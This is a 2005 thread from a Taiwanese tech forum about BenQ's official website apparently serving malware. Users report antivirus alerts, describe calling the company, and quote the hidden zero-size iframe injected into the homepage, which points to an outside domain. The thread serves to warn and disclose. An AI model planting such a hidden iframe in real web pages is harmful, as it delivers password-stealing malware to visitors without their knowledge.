PCDVD數位科技討論區

PCDVD數位科技討論區 (https://www.pcdvd.com.tw/index.php)
-   疑難雜症區 (https://www.pcdvd.com.tw/forumdisplay.php?f=34)
-   -   BenQ 官方網站被植入特洛伊病毒??? (https://www.pcdvd.com.tw/showthread.php?t=450679)

PFD 2005-02-27 06:09 PM

我剛下載LCD驅動程式KAV有偵測出蠕蟲病毒!

sean1976 2005-02-27 06:13 PM

他首頁被加了一個iframe導出去.強烈建議不要嘗試進入以下網址..
代碼:
<iframe width=0 height=0 src=http://www.szadk.com/***.htm></iframe>

sean1976 2005-02-27 06:25 PM

剛打電話過去.. 他竟問我我這邊可以處理嗎?.. 說要明天才能處理.. = ="
我跟他說我不是員工.. 我是網友.. 就說個謝謝就沒了.. = =
禱告吧.. 沒防毒軟體的User ..

club700 2005-02-27 06:50 PM

引用:
作者sean1976
剛打電話過去.. 他竟問我我這邊可以處理嗎?.. 說要明天才能處理.. = ="
我跟他說我不是員工.. 我是網友.. 就說個謝謝就沒了.. = =
禱告吧.. 沒防毒軟體的User ..


有這種回應我想蠻可以想像的。 :think:
蠻多公司的網頁是請網頁設計公司負責及主機代管的,公司只負責提供資料。
sean兄是打給benq吧,如果benq也是請別人設計的;我想他們大概沒什麼能力處理。我看大概只能上班後反應給網頁設計公司。就算benq自已管網站,接電話的客服也沒能力處理,大概也要等上班才能反應給mis部門。

GT500 2005-02-27 07:02 PM

我用NORTON 的確有
有清除程式嗎...?真糟糕

u8526425 2005-02-27 07:17 PM

怪了
IFRAME漏洞不是去年的事嗎
怎麼現在還有 ??
http://www.microsoft.com/taiwan/sec...n/ms04-040.mspx

sean1976 2005-02-27 07:32 PM

引用:
作者club700
有這種回應我想蠻可以想像的。 :think:
蠻多公司的網頁是請網頁設計公司負責及主機代管的,公司只負責提供資料。
sean兄是打給benq吧,如果benq也是請別人設計的;我想他們大概沒什麼能力處理。我看大概只能上班後反應給網頁設計公司。就算benq自已管網站,接電話的客服也沒能力處理,大概也要等上班才能反應給mis部門。


大公司應該有大公司的作為..不能這樣混過去..^^"
接電話的不是客服..在google上找到財務長電話..
打過去應該秘書接的..聽完後說幫我轉副總.. 問我怎麼處理的就是副總那支電話的人.. = =
畢竟這是被植木馬..會影響上網的人.. 想說今天在不處理..打給記者朋友好了.. XD

剛到那個iframe抓了一下網頁檔案..
有執行兩個VScript : bbs003302.gif和bbs003302.css
但內容都已經被編碼了.看不出木馬會做什麼事.. >"<

GT500 2005-02-27 07:42 PM

引用:
作者prost555
剛剛想去BenQ官網下載個驅動程式,但一進它的首頁McAfee就一直提醒偵測到
PWS-Lineage 特洛伊病毒,不知是誤判還是我的電腦之前就已中毒,有哪位網兄
願意到BenQ網站幫忙測試一下!

回樓主的話
我已經成功刪除了
參考一下...
http://www.chatroom.idv.tw/novirus/list.asp?id=3444

club700 2005-02-27 07:45 PM

引用:
作者sean1976
大公司應該有大公司的作為..不能這樣混過去..^^"
接電話的不是客服..在google上找到財務長電話..
打過去應該秘書接的..聽完後說幫我轉副總.. 問我怎麼處理的就是副總那支電話的人.. = =
畢竟這是被植木馬..會影響上網的人.. 想說今天在不處理..打給記者朋友好了.. XD

剛到那個iframe抓了一下網頁檔案..
有執行兩個VScript : bbs003302.gif和bbs003302.css
但內容都已經被編碼了.看不出木馬會做什麼事.. >"<


sean兄還真強,連財務長的電話也找的到 :eek:
其實我的意思是對這些公司處理這種事的速度沒什麼信心啦,特別是如果只是找到客服之類的。不過你找到了大頭,應該是比較有效果,如果再沒有即時反應(就算是暫時關掉網站也比沒處理好),那benq真的就太糟糕了一點。
至於你po的bbs003302.css,好像是盗取天堂的帳號密碼的木馬,之前好像掃到過 :stupefy:

alex360 2005-02-27 09:47 PM

我也有偵測出來~~!!

und in file C:\DOCUMENTS AND SETTINGS\ADMINISTRATOR\LOCAL SETTINGS\TEMPORARY INTERNET FILES\CONTENT.IE5\MF6BITUF\NEW[1].HTM.
Infection: Exploit.VBS.Phel.c
Action: The file was deleted.

我用的是F-Secure Anti-Virus Client Security 5.55-SR1


所有的時間均為GMT +8。 現在的時間是03:35 PM.

vBulletin Version 3.0.1
powered_by_vbulletin 2025。